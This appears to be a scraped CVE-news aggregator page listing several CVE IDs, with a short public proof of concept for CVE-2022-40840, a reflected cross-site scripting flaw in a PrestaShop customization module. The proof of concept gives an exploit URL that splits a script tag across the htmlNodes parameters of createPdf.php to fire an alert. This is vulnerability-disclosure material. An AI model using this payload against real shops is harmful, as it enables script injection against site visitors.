CVE-2023-50976: Transactions API Authorization by oleiman · Pull Request #14969 · redpanda-data/redpanda

CVE-2023-6905

CVE-2023-6903

CVE-2023-6904

CVE-2023-3907

ndk design NdkAdvancedCustomizationFields 3.5.0 is vulnerable to Cross Site Scripting (XSS) via createPdf.php.

Permalink

\# Exploit Title: NdkAdvancedCustomizationFields Prestashop module <= 3.5.0 cross site scripting (xss)

\# Date: 01-11-2022

\# Exploit Author: dalii

\# Vendor Homepage: https://www.ndk-design.fr/

\# Software Link : https://www.ndk-design.fr/documentation-ndkadvancedcustomizationfields-prestashop-english

\# Version: 3.5.0

\# Tested on: Windows 10

\# CVE: CVE-2022-40840

Parameters: htmlNodes

Exploit:

http://localhost/modules/ndk\_advanced\_custom\_fields/createPdf.php?htmlNodes\[0\]=<script&htmlNodes\[1\]=>alert("xss\_poc")</&htmlNodes\[2\]=script>&idCustomer=..&idProduct=..&idCustomization=..

http://localhost/img/render.html

Headline

CVE-2022-40840: cve-s/poc.txt at main · daaaalllii/cve-s

CVE: Latest News